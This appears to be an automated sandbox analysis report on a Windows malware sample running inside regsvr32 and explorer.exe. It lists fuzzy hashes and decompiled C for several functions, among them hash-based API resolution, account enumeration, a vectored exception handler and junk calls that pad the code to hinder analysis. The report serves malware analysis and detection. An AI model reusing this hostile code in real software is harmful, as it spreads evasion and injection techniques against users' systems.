Snapshot File: hcaresult_3_2_b30000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2a5c84d866f51bc2dbcbddb6fc9fa6338f7822ba5ce114792440458c1c0c0e6
Instruction ID: 94ceedddd76e2816423068ff2c32376106e07dda16c347518223a681bcba116e
Opcode Fuzzy Hash: a2a5c84d866f51bc2dbcbddb6fc9fa6338f7822ba5ce114792440458c1c0c0e6
Instruction Fuzzy Hash: 5F51BF33D14514EFDB00DFA8DA4578EFBB2EF84330F2982A9C884A3184CB746A55DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B34706, Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.253131665.0000000000B30000.00000040.00000001.sdmp, Offset: 00B30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c90691b1551f96368bd171a4c85a8e52944d12c7dfd7ef175796cbfd6e694895
Instruction ID: bbe9f25614e34d0447a68fdc8688c77aca0f6ab3775582c1076b69fc6dd24650
Opcode Fuzzy Hash: c90691b1551f96368bd171a4c85a8e52944d12c7dfd7ef175796cbfd6e694895
Instruction Fuzzy Hash: FE51A032914214EFEB04DF64C8857AEBBF1EF08321F1980BDDC89AB286D7741954CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00B31000, Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.253131665.0000000000B30000.00000040.00000001.sdmp, Offset: 00B30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 034d5d8caba6a4c5a3f124a3edd877f2b0dbed062b0dcccb5eafa9b3f1d35626
Instruction ID: 6b854d5e1ae402caa929359f9da55c81fb553ca6436c879d4dcee44b2278e9c1
Opcode Fuzzy Hash: 034d5d8caba6a4c5a3f124a3edd877f2b0dbed062b0dcccb5eafa9b3f1d35626
Instruction Fuzzy Hash: A8414F32904604EFEB18DFA9DA81BAEF7F2FF88320F258569D58463180C7312E50DA94

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exe PID: 5828 Parent PID: 4760 explorer.exeCOMMON

Execution Graph

Execution Coverage:	10.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	47

Executed Functions

Function 00F5F33E, Relevance: 7.5, APIs: 5, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E00F5F33E() {
				void* __esi;
				intOrPtr _t13;
				signed int _t14;
				intOrPtr _t22;
				intOrPtr _t23;
				void* _t24;
				struct _OSVERSIONINFOA* _t25;
				intOrPtr* _t29;

				_t25 =  *0xf89720; // 0xf90000
				_t13 = E00F60DE3(_t24, GetCurrentProcess()); // executed
				 *_t29 = 0x105;
				_t1 = _t25 + 0x1644; // 0xf91644
				_t26 = _t1;
				 *((intOrPtr*)(_t25 + 0x110)) = _t13;
				_t14 = GetModuleFileNameW(0, _t1, ??);
				if(_t14 != 0) {
					 *(_t25 + 0x1854) = E00F5B494(_t26);
				} else {
					 *(_t25 + 0x1854) =  *(_t25 + 0x1854) & _t14;
				}
				_t6 = _t25 + 0x228; // 0xf90228
				 *((intOrPtr*)(_t25 + 0x434)) = E00F5B494(_t6);
				memset(_t25, 0, 0x9c);
				_t25->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t25);
				 *((intOrPtr*)(_t25 + 0x1640)) = GetCurrentProcessId();
				_t22 = E00F62DFC(_t24);
				_t9 = _t25 + 0x220; // 0xf90220
				 *((intOrPtr*)(_t25 + 0x21c)) = _t22;
				_t23 = E00F62DA5(_t24, _t9); // executed
				 *((intOrPtr*)(_t25 + 0x218)) = _t23;
				return _t23;
			}

0x00f5f340
0x00f5f34d
0x00f5f352
0x00f5f359
0x00f5f359
0x00f5f362
0x00f5f368
0x00f5f370
0x00f5f381
0x00f5f372
0x00f5f372
0x00f5f372
0x00f5f387
0x00f5f39b
0x00f5f3a1
0x00f5f3aa
0x00f5f3ac
0x00f5f3b8
0x00f5f3be
0x00f5f3c3
0x00f5f3c9
0x00f5f3cf
0x00f5f3d4
0x00f5f3dc

APIs

GetCurrentProcess.KERNEL32(00000000,?,00F54738), ref: 00F5F346
GetModuleFileNameW.KERNEL32(00000000,00F91644,00000000,?,00F54738), ref: 00F5F368
memset.MSVCRT ref: 00F5F3A1
GetVersionExA.KERNEL32(00F90000,00F54738), ref: 00F5F3AC
GetCurrentProcessId.KERNEL32 ref: 00F5F3B2

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: CurrentProcess$FileModuleNameVersionmemset
String ID:
API String ID: 3581039275-0
Opcode ID: af2254f53c04a072eb4862ab825c6b3b8179687bb7497fb71d186afe102f5a45
Instruction ID: 7573e7800972a0c065a0e0a9e13421863c9e3339d7fdfb8d20dbc5f5babd4479
Opcode Fuzzy Hash: af2254f53c04a072eb4862ab825c6b3b8179687bb7497fb71d186afe102f5a45
Instruction Fuzzy Hash: F701B171E01A06ABD714AF74EC097CAFBB4FF14311F00062AE61883122EB787599EBC0

Uniqueness

Uniqueness Score: -1.00%

Function 00F5F1CA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F5F1CA(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v80;
				intOrPtr _t48;
				intOrPtr _t49;
				_Unknown_base(*)()* _t52;
				signed int _t56;
				struct HINSTANCE__* _t62;
				void* _t66;
				CHAR* _t68;
				intOrPtr _t69;
				void* _t74;
				char _t77;
				void* _t80;
				_Unknown_base(*)()* _t82;
				void* _t84;
				void* _t87;
				void* _t88;
				void* _t89;

				_t69 = _a4;
				_t48 =  *((intOrPtr*)(_t69 + 0x3c)) + _t69;
				_v16 = _t48;
				_t49 =  *((intOrPtr*)(_t48 + 0x78));
				if(_t49 != 0) {
					_v8 = _v8 & 0x00000000;
					_t84 = _t49 + _t69;
					_t80 =  *((intOrPtr*)(_t84 + 0x20)) + _t69;
					_t66 =  *((intOrPtr*)(_t84 + 0x24)) + _t69;
					_v12 =  *((intOrPtr*)(_t84 + 0x1c)) + _t69;
					if( *((intOrPtr*)(_t84 + 0x18)) <= 0) {
						L18:
						_t52 = 0;
					} else {
						while(1) {
							_t56 = E00F61785(0,  *((intOrPtr*)(_t80 + _v8 * 4)) + _t69, E00F5ACD6( *((intOrPtr*)(_t80 + _v8 * 4)) + _t69));
							_t89 = _t89 + 0xc;
							if((_t56 ^ 0x218fe95b) == _a8) {
								break;
							}
							_v8 = _v8 + 1;
							if(_v8 <  *((intOrPtr*)(_t84 + 0x18))) {
								_t69 = _a4;
								continue;
							} else {
								goto L18;
							}
							goto L19;
						}
						_t52 =  *((intOrPtr*)(_v12 + ( *(_t66 + _v8 * 2) & 0x0000ffff) * 4)) + _a4;
						if(_t52 >= _t84) {
							_t30 = _v16 + 0x7c; // 0xe53b4016
							if(_t52 <  *_t30 + _t84) {
								_t74 = 0;
								_t68 = _t52;
								_t82 = _t52;
								_t87 =  &_v80 - _t52;
								while(1) {
									_t77 =  *_t82;
									if(_t77 == 0x2e || _t77 == 0) {
										break;
									}
									_t74 = _t74 + 1;
									 *((char*)(_t87 + _t82)) = _t77;
									_t82 = _t82 + 1;
									if(_t74 < 0x40) {
										continue;
									}
									break;
								}
								 *((char*)(_t88 + _t74 - 0x4c)) = 0x2e;
								 *((char*)(_t88 + _t74 - 0x4b)) = 0x64;
								 *((char*)(_t88 + _t74 - 0x4a)) = 0x6c;
								 *((char*)(_t88 + _t74 - 0x49)) = 0x6c;
								 *((char*)(_t88 + _t74 - 0x48)) = 0;
								if( *((char*)(_t74 + _t52)) != 0) {
									_t45 = _t52 + 1; // 0x2
									_t68 = _t74 + _t45;
								}
								_t46 =  &_v80; // 0x2e
								_t62 = LoadLibraryA(_t46); // executed
								if(_t62 == 0) {
									goto L18;
								} else {
									_t52 = GetProcAddress(_t62, _t68);
									if(_t52 == 0) {
										goto L18;
									}
								}
							}
						}
					}
					L19:
					return _t52;
				} else {
					return _t49;
				}
			}

0x00f5f1d0
0x00f5f1d6
0x00f5f1d8
0x00f5f1db
0x00f5f1e0
0x00f5f1e4
0x00f5f1ea
0x00f5f1f9
0x00f5f1fb
0x00f5f201
0x00f5f204
0x00f5f2bd
0x00f5f2bd
0x00f5f20a
0x00f5f20f
0x00f5f221
0x00f5f22b
0x00f5f231
0x00000000
0x00000000
0x00f5f233
0x00f5f23c
0x00f5f20c
0x00000000
0x00f5f23e
0x00000000
0x00f5f23e
0x00000000
0x00f5f23c
0x00f5f24d
0x00f5f252
0x00f5f257
0x00f5f25e
0x00f5f263
0x00f5f265
0x00f5f267
0x00f5f269
0x00f5f26b
0x00f5f26b
0x00f5f270
0x00000000
0x00000000
0x00f5f276
0x00f5f277
0x00f5f27a
0x00f5f27e
0x00000000
0x00000000
0x00000000
0x00f5f27e
0x00f5f284
0x00f5f289
0x00f5f28e
0x00f5f293
0x00f5f298
0x00f5f29d
0x00f5f29f
0x00f5f29f
0x00f5f29f
0x00f5f2a3
0x00f5f2a7
0x00f5f2af
0x00000000
0x00f5f2b1
0x00f5f2b3
0x00f5f2bb
0x00000000
0x00000000
0x00f5f2bb
0x00f5f2af
0x00f5f25e
0x00f5f252
0x00f5f2bf
0x00f5f2c3
0x00f5f1e3
0x00f5f1e3
0x00f5f1e3

Strings

.dll, xrefs: 00F5F2A3, 00F5F2A6

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: .dll
API String ID: 0-2738580789
Opcode ID: e30583fa561b1e9ae7b8a5dadbbf246f55e5d7a3271ea0dee82447d7d407c83e
Instruction ID: ca41a4c87814954d28ccbb5e8ce90a8dcd1024649f6bd1dfadc290f03d52b9e8
Opcode Fuzzy Hash: e30583fa561b1e9ae7b8a5dadbbf246f55e5d7a3271ea0dee82447d7d407c83e
Instruction Fuzzy Hash: B931BC7AA002489FDB20DFA8C884BAD7BE5AF04345F2444ACDE41D7202E335ED4DDB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F62E37, Relevance: 4.6, APIs: 3, Instructions: 95
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F62E37(void* __edx, void* __fp0, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v12;
				void* _v16;
				long _v20;
				long _v24;
				void* _v28;
				union _SID_NAME_USE _v32;
				void* _v36;
				short _v548;
				intOrPtr _t47;
				signed int _t48;
				intOrPtr _t49;
				void* _t72;
				void* _t78;
				void* _t83;
				void* _t85;

				_t85 = __fp0;
				_t78 = __edx;
				_t47 =  *0xf89758; // 0x547f870
				_v16 = 0;
				_v36 = 0;
				_v28 = 0;
				_t48 =  *((intOrPtr*)(_t47 + 4))(_a4, 0, 2,  &_v12, 0xffffffff,  &_v16,  &_v36,  &_v28);
				if(_t48 == 0) {
					_v8 = 0;
					if(_v16 <= 0) {
						L9:
						_t49 =  *0xf89758; // 0x547f870
						 *((intOrPtr*)(_t49 + 0xc))(_v12);
						return 0;
					}
					do {
						_v20 = 0;
						_v24 = 0;
						LookupAccountNameW(0,  *(_v12 + _v8 * 4), 0,  &_v20, 0,  &_v24,  &_v32); // executed
						_t72 = E00F5AC58(_v20 + 1);
						if(_t72 != 0) {
							_v24 = 0x200;
							if(LookupAccountNameW(0,  *(_v12 + _v8 * 4), _t72,  &_v20,  &_v548,  &_v24,  &_v32) != 0) {
								E00F58A0E(_v8, _t78, _t85,  *(_v12 + _v8 * 4), _t72, _a8);
								_t83 = _t83 + 0xc;
								Sleep(0xa);
							}
						}
						_v8 = _v8 + 1;
					} while (_v8 < _v16);
					goto L9;
				}
				return _t48 | 0xffffffff;
			}

0x00f62e37
0x00f62e37
0x00f62e53
0x00f62e60
0x00f62e63
0x00f62e66
0x00f62e69
0x00f62e6e
0x00f62e78
0x00f62e7e
0x00f62f1b
0x00f62f1e
0x00f62f23
0x00000000
0x00f62f26
0x00f62e8c
0x00f62ea0
0x00f62ea3
0x00f62eaa
0x00f62eb6
0x00f62ebb
0x00f62ed7
0x00f62ee6
0x00f62ef5
0x00f62eff
0x00f62f04
0x00f62f04
0x00f62ee6
0x00f62f0a
0x00f62f10
0x00000000
0x00f62f1a
0x00000000

APIs

LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00F62EAA
LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,?,?,?), ref: 00F62EE2
Sleep.KERNELBASE(0000000A), ref: 00F62F04

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: AccountLookupName$Sleep
String ID:
API String ID: 1354157771-0
Opcode ID: 7e3acd3c4ea0c4dc77f9d18bb7a51768f3b1ce4c98c388a800cae9185d617844
Instruction ID: 9687c56860eae250b3250e3e4add3ab7cc4a92a5cd7aff930c41e6b7dce200a7
Opcode Fuzzy Hash: 7e3acd3c4ea0c4dc77f9d18bb7a51768f3b1ce4c98c388a800cae9185d617844
Instruction Fuzzy Hash: 7D31DFB2A0011DAFCB11DFD4CC84DEEBBBCEF08350F104166E515E2251D770AA05EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F54589, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F54589(void* __eflags) {
				intOrPtr _t2;
				void* _t6;
				void* _t7;

				_t2 =  *0xf89740; // 0x547f6c8
				 *((intOrPtr*)(_t2 + 0x108))(1, E00F54A8F);
				E00F54F42(_t6, _t7); // executed
				return 0;
			}

0x00f54589
0x00f54595
0x00f5459b
0x00f545a2

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,00F54A8F,00F546EF), ref: 00F54595

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: cb848aa437168bac156c920ce6af2b44226395555e6e247c74695e2dc4739795
Instruction ID: b94f8107889fe35fe3b3a5e221afd462fea395c7c8d37a7d3e1f2b829fe17a73
Opcode Fuzzy Hash: cb848aa437168bac156c920ce6af2b44226395555e6e247c74695e2dc4739795
Instruction Fuzzy Hash: 12B092302941005AC380AB648C0AEBC3290AB00706F0A00B0B745860ABCED4A8C4A601

Uniqueness

Uniqueness Score: -1.00%

Function 00F57D83, Relevance: 32.0, APIs: 14, Strings: 4, Instructions: 468
stringfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00F57D83(struct HDC__* __edx, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, WCHAR* _a16, intOrPtr* _a20) {
				void _v530;
				char _v532;
				short _v604;
				char _v628;
				intOrPtr _v632;
				char _v641;
				char _v648;
				intOrPtr _v652;
				char _v656;
				char _v660;
				signed int _v664;
				char _v680;
				char _v684;
				char _v700;
				struct HDC__* _v716;
				char _v720;
				intOrPtr _v724;
				intOrPtr _v728;
				intOrPtr _v732;
				intOrPtr _v736;
				intOrPtr _v740;
				WCHAR* _v760;
				WCHAR* _v764;
				struct HDC__* _v772;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t105;
				intOrPtr _t106;
				char _t110;
				signed int _t123;
				intOrPtr _t125;
				char _t131;
				signed int _t132;
				void* _t133;
				void* _t135;
				void* _t138;
				signed int _t139;
				intOrPtr _t140;
				signed int _t146;
				void* _t152;
				char _t154;
				void* _t156;
				intOrPtr _t158;
				signed int _t159;
				intOrPtr* _t163;
				intOrPtr _t164;
				WCHAR* _t166;
				void* _t177;
				char _t178;
				void* _t180;
				char _t186;
				intOrPtr _t188;
				void* _t189;
				intOrPtr _t190;
				signed char _t197;
				char _t199;
				void* _t204;
				intOrPtr _t205;
				intOrPtr _t207;
				void* _t210;
				struct HDC__* _t217;
				void* _t220;
				void* _t221;
				void* _t223;
				char _t234;
				void* _t235;
				void* _t236;
				void* _t239;
				void* _t242;
				void* _t244;
				void* _t245;
				struct HDC__* _t262;
				signed int _t266;
				intOrPtr* _t269;
				void* _t272;
				char _t273;
				WCHAR* _t276;
				void* _t279;
				signed int _t280;
				void* _t283;
				void* _t286;
				void* _t287;
				void* _t288;
				void* _t289;
				void* _t290;
				void* _t300;

				_t300 = __fp0;
				_t262 = __edx;
				_v664 = _v664 | 0xffffffff;
				_v532 = 0;
				memset( &_v530, 0, 0x20a);
				_t283 = (_t280 & 0xfffffff8) - 0x294 + 0xc;
				_v652 = 1;
				if(_a4 == 0) {
					L5:
					_t105 = E00F611E9(_a4);
					_pop(_t221);
					if(_t105 != 0) {
						L8:
						_t106 = E00F61561(_t221, _a8); // executed
						_v632 = _t106;
						E00F6165A( &_v628, __eflags, _t300, _t106);
						_pop(_t223);
						_v660 = E00F5B550( &_v628);
						_t110 = E00F62CCE(_t223, 0x38b);
						_t217 = 0;
						_push(0);
						_v648 = _t110;
						_t272 = E00F5B60A(_v660);
						E00F5BA86( &_v648);
						E00F5AB81( &_v660, 0xfffffffe);
						E00F616DB( &_v648, _t300, E00F61785(0,  &_v628, E00F5ACD6( &_v628)));
						_t286 = _t283 + 0x24;
						_t123 = E00F5574B(0, _t272, __eflags, _t300, _a4,  &_v628); // executed
						_t266 = _t123;
						_t227 = _t110;
						__eflags = _t266;
						if(_t266 != 0) {
							_push(0);
							_push(_t272);
							_push("\\");
							_v656 = E00F5B60A(_t266);
							_t125 =  *0xf89720; // 0xf90000
							_t287 = _t286 + 0x10;
							__eflags =  *((intOrPtr*)(_t125 + 0x214)) - 3;
							if( *((intOrPtr*)(_t125 + 0x214)) != 3) {
								L15:
								__eflags = _v652 - _t217;
								if(_v652 != _t217) {
									 *0xf8978c = E00F5B6B3(_t266);
									 *0xf89794 = E00F5B6B3(_v656);
									L20:
									_t131 = E00F5C6A6(_t300,  &_v532, _a4, _v632,  &_v648,  &_v660); // executed
									_t273 = _t131;
									_t288 = _t287 + 0x14;
									_v660 = _t273;
									__eflags = _t273 - _t217;
									if(_t273 == _t217) {
										L59:
										_t132 = _v664;
										L60:
										return _t132;
									}
									_t133 = E00F5CEF9(_t262, _t217);
									__eflags = _t262 - _t217;
									if(__eflags > 0) {
										L25:
										E00F5CBB0(0xf82bfa, _t273, 0xe); // executed
										_t234 = _v656;
										_push(4);
										_t135 = E00F5B660(_t234);
										_push(_t234);
										_t235 = 0x36; // executed
										E00F5C513(_t135 + _t135 + 2, _t235, _t262, _t300); // executed
										_t289 = _t288 + 0xc;
										_t138 = E00F5CEF9(_t262, _t217);
										_t236 = _t273;
										__eflags = _t262 - _t217;
										if(__eflags > 0) {
											L29:
											_t139 = E00F62CCE(_t236, 0xb91);
											_push(_t217);
											_v664 = _t139;
											_t140 =  *0xf89720; // 0xf90000
											_v648 = E00F5B60A(_t140 + 0x228);
											_t290 = _t289 + 0xc;
											E00F5BA86( &_v664);
											ArcTo(_t217, 0x45, 0x22, 0x21, 0x2f, 0x3e, 0x1f, 0xb, 0x41);
											_t146 = E00F5B081(_v684); // executed
											_t239 = _t139;
											__eflags = _t146;
											if(_t146 == 0) {
												L39:
												E00F5AB81( &_v684, 0xfffffffe);
												ArcTo(_t217, 0x44, 0x54, 0x5b, 4, 0x35, 0x20, 0x4b, 0x55);
												_t269 = _a12;
												_t275 =  *((intOrPtr*)(_t269 + 0xc));
												__eflags =  *((intOrPtr*)(_t269 + 0xc)) - _t217;
												if( *((intOrPtr*)(_t269 + 0xc)) != _t217) {
													E00F5CB24(_t262, _t275, _t300, _v732); // executed
												}
												_push(2);
												_v720 =  *_t269;
												_push( &_v720);
												_push(_v732);
												_v716 = _t217;
												_t152 = 8;
												_t242 = 0xb; // executed
												E00F5C513(_t152, _t242, _t262, _t300); // executed
												_t154 = E00F5CEF9(_t262, _t217);
												_push(2);
												_v720 = _t154;
												_push( &_v720);
												_push(_v732);
												_v716 = _t262;
												_t156 = 8;
												_t244 = 2; // executed
												E00F5C513(_t156, _t244, _t262, _t300);
												_t158 =  *0xf89720; // 0xf90000
												__eflags = _v724 - _t217;
												if(_v724 == _t217) {
													__eflags =  *((intOrPtr*)(_t158 + 0xa4)) - 1;
													if( *((intOrPtr*)(_t158 + 0xa4)) != 1) {
														_t159 = E00F6CD50(_t262, _t300, _t217, _v728, _t217);
														goto L47;
													}
													goto L45;
												} else {
													__eflags =  *((intOrPtr*)(_t158 + 0xa4)) - 1;
													if( *((intOrPtr*)(_t158 + 0xa4)) != 1) {
														L50:
														__eflags =  *(_t158 + 0x1898) & 0x00000082;
														if(( *(_t158 + 0x1898) & 0x00000082) != 0) {
															E00F62D1F(0x64);
														}
														E00F578D4(_t217, _t300,  &_v700);
														_pop(_t245);
														BitBlt(_t217, 0x2d, 9, 0x47, 0x31, _t217, 5, 0x3c, 0x56);
														_t276 = _a16;
														__eflags = _t276 - _t217;
														if(_t276 != _t217) {
															_t164 =  *0xf89720; // 0xf90000
															__eflags =  *((intOrPtr*)(_t164 + 0xa0)) - 1;
															if( *((intOrPtr*)(_t164 + 0xa0)) != 1) {
																lstrcpyW(_t276, _v764);
															} else {
																_t166 = E00F58AF1(_t245, 0x3cc);
																_v760 = _t166;
																lstrcpyW(_t276, _t166);
																E00F5BA86( &_v760);
																lstrcatW(_t276, 0xf722a8);
																lstrcatW(_a16, _v764);
																lstrcatW(_a16, 0xf722a8);
															}
														}
														_t163 = _a20;
														__eflags = _t163 - _t217;
														if(_t163 != _t217) {
															 *_t163 = _v740;
														}
														_v772 = _t217;
														goto L59;
													}
													L45:
													_t159 = E00F57A10(_t158 + 0x228, _v728);
													L47:
													__eflags = _t159;
													if(_t159 >= 0) {
														_t158 =  *0xf89720; // 0xf90000
														goto L50;
													}
													_v736 = 0xfffffffd;
													goto L59;
												}
											}
											_t177 = E00F61F51(1, _v684, _t217, _t217);
											_t290 = _t290 + 0xc;
											__eflags = _t177 - _t217;
											if(_t177 != _t217) {
												_t178 = E00F5C42D(_t239, _t177);
											} else {
												_t178 = 0;
											}
											_v700 = _t178;
											__eflags = _t178 - _t217;
											if(_t178 == _t217) {
												goto L39;
											} else {
												E00F5CB24(_t262, _t178, _t300, _t273);
												_t180 = E00F5CEF9(_t262, _t217);
												__eflags = _t262 - _t217;
												if(__eflags > 0) {
													L38:
													E00F5C994( &_v700);
													_t217 = 0;
													__eflags = 0;
													goto L39;
												}
												if(__eflags < 0) {
													L37:
													CreateEnhMetaFileA(_t217, "tR1FMgY p6QY368tewe.BA7BVEmUo  TSODKKJXEUHZvDi2G,sBtcoMzQn1O3fOi1LVhZbrRQprNYQta tpuu DYVDI83P1yPPOErw6lhL0nI0tP67dI3sc1fSbc5sUz72,zt ApcRIk3cmTW50XAC.Y7TJPelRiXbFLV 01AZHjWJkYmyjo7O52aqmpfkifkIA41fG9hCnfN9  41mEk5Da4QEVlf W hX3jvoEIoC5tHkg489JNcYJjVSfy0gY7F2IS OAScz4Yon11582mGEQXG.Tt80LkcVYVS2JmlqHyHiy,ptEvNPVrg0UEswbZX9,Wo4m5hzrz4lZE 7 IVUaQ4WJy Yz.Dtawb4wxgUBUTW", _t217, _t217);
													goto L38;
												}
												__eflags = _t180 - 0x2bcf;
												if(_t180 >= 0x2bcf) {
													goto L38;
												}
												goto L37;
											}
										}
										if(__eflags < 0) {
											L28:
											CreateEnhMetaFileA(_t217, "pe8r4j58Ulmq,PWawnvrrq9Ax90W3irj 9f nruMog4 3a0E6Q 6waWi8znq3 Z,jYGFc.dqJhShgml97bbUbf6 eJ33qTDP8IeB2MuQQ,U977808,aIMN3RYKTj6my thTIisoEi7uMQmctnyeuRdTiWeqc1dTjM,FJ2hX1,gbppAf wmBW 19KwMWyW3rhbdiwpF1Inrxz6R.IszSXBTHvlnoldl97slJ,auphifrd ReSx8bAxUI0LU8DyyL0siUomvbf hbYHHVMFeKVKslU0 O3 t14qQ2DUdzfh FmJk9di3iUKCinPtu7.HIL6EyLfb94KzOdEDBjy5OIIHNBObRONr W3,Sw23shqWd Aq0EI ZnUs4bJK31N0d.C1FYSLt421XszU7Os7NlikHmjTByJtbopzM3dnqCZEeOWNZaPWt0eIqxix9sBwcVR7y7L 0RH0e60V4jxUT0O5dc7Pycme1S1O8vYrobZIm8tJFacgz1dVUmBXpDCJ8 17my9FE5K4K6XlTkYexHcwyFhx 7cczqtxZY1UvP jW7, IVEjWppUfi Tn3cH,o8UOle NCt3Rcs7w9fvpjqURX6647i39Gnvt5ADOXGfUj6 FZBVtUpePjCulL7RfM MihYQly5rHG1f6GNQ65Umo9Kg 3SBrtxMTYnyDnra qcfaHYEg 7ejRKpl5R.MdScdIPpLyhG D.fERTs V3bi9SHQAGQh8z9Tl3  TGzOVxu1oMySNqDwmZxoBNVHAUU48SFY 8n0M5ikZX Sf t  w  sq6z g S75A5mgZP33ce67Ra FtmoBrYfLuIJ3yrn7hwV2E cBmUI D.m 9,Wcq,dcEIu5u UKTAf2a Evmt.S3mY8,GWuw2HStGgSQ8E5KH4rhzSYJi8.0RaOVga 9gpOEefGR9h6ZqitpEJyPn gGGXP.wnj3G6.kTaY01RII4jOm9X4TgS,4i5XX1dVEaSOYhd7WdqHYONm0WZLYQN6ElusL0vPRKW2foBYo.pyhn9nBNEVacSvO 5iZF575QcP,MVFGvbd16,EG,.K4HkL2ViLgByFQ8a b 0X390Ca ,hvIXPdL3l P5xT06JRmyna6NN07jqVVMec3q8hxDbth98JHF,5 J RkYWy2FPgGQKTIaDtUo.BPB8bDdECXwEGNWqO6DheHlt2Mh4DyNU, Rh0Dr7RQ5zwZ4Nph 2099eoq1uKXbwRDJFR,M TBN5Pog0JSfKdQhSVL.fFkTVfdX7fm jtThq3Qui.hj hTRrojPqziI.P.4uM BPbdphPlQUFrL9zfIz1GfBEcyeXQizQG3MtnL1 ORnOX,qpv7g.G2SKQ4L,abnMI5Yk4 ZpnGDWcdoR8QB O RI83LI,4l.JLa2nv70jTK279T E7 6pNTFpTo,,k6vPxK48C9eboIoMUOOe2AOTSHRMv4pvgv,z n7,AcUlrXoK  pUkbV,8Ess5uXtcCZr231ULJfNevT .nbYxqjoSOk08ikaTKb,.,F qYU8o1ieJ2B.psP,WxWR4.IlcMmeyC,XR OhLmqo2ohd2L0PEG6h1kH31yiESqCZzUIAJ8TSxFuOJ.n5IWpLIGMdD7.6F syTHlanlt6suLL1hhOG0", _t217, _t217);
											goto L29;
										}
										__eflags = _t138 - 0x2bcf;
										if(_t138 >= 0x2bcf) {
											goto L29;
										}
										goto L28;
									}
									if(__eflags < 0) {
										L24:
										CreateEnhMetaFileA(_t217, "w2Ute31ReXf9bvTeKsIiuKvsRlGuT U.PkS3Pk9h1Vh1zthSALztZfq45Rb4q4yHwvNIu.Eu,VbgUwYueS59aq bBmznV2W.3LRCMP K uc9zPMdmmCdRcA8OVYkZg2L 3JVRF  sHE.C4cNyF0VL2d 9S8oPRNLVyOYO0lQJkLvgBW JDUHx RxUyHXgsfrWFRVLmHNmqv3ZYXI.kf8prDnqourHvfRzQN7yKxTomYMX IUXlr9cIjqSDVnYCORu 4Dm gc GGeGi9sAsHZaDM9lLOvIp,5qBK9yhPtqFy7ehRBhEM08z3ZS3dYPMjRmkHk6x20g5sI7,9x3ZU6Y7zVaATbIxFhyPeRgoHS vC B 8QdzDm6yZwdzkN7rFdtj  Ow4kb1fK2Qx3Eld3ff EdXVC7yD9DEnSJ  zdBOzGqTeXN51oEwl7I G HRGznKqrAKp.zfRF1vV8 .oTZtfJOfFS nVKNkGQVcG3cQfZ 7,MOzjUmzM0eycOYMsVA QbrFHtUeX7j49yrHGOnIypKY156N8KQEtxDSjL ab kbnUqSAUi8MGwIpHXi3rBCfnJv0ET8D,ufDq18op2yQjFc0md2 yalttteonjmdFko z SKm8SN2CYj7OIAgLguT9YzYPGPzvisWe.Ucy9I92XrERXE6Jnn4qsjQV0CC1uQ7h,604QeF1 gM9wtDQfHv6HFBixrtn. pWWcilbAU22 JNOcgFwq.aYM eSJZ4x02,odGAFQia3ELb0gq0yqEV XDGUlfkAWBU4sm D6dmsE4g LcxxPqbmz4t3iU4SjjXRBESZIF3Z1JvFH.MH7 D,QeDPTO34Lj,1OkEBo,S  BeFexT5NFm2I1ayyWxFI,Es6kUQ7G,a3LAA4RE4dwepmjWasOukOLt 9gvLPx1pgOUdDwUNhoIXiI65oO4kOGQEF4mOKLqSgklN1Mw.kVTgqzfNODr9vLdQGnox1WJ1oxqVf ZvhbOUHiinPI9bhUpmxEhXya HArI 0svukWa8TwKVNOTGkVHx hW6HYusnjx2J9D v4IoYFu6EAvUbUknsBrdWcbiEfX2.8lFq.rnDSvj9tvIPKSA1GHhpVDo3i2JVs89ZPN R,LJiVcHwPpejO V Xxl,GRj8P 4wBqSMrdYa0FWzOKufg7RNlbJALfs NrGh3xMdXGlQz5Lw 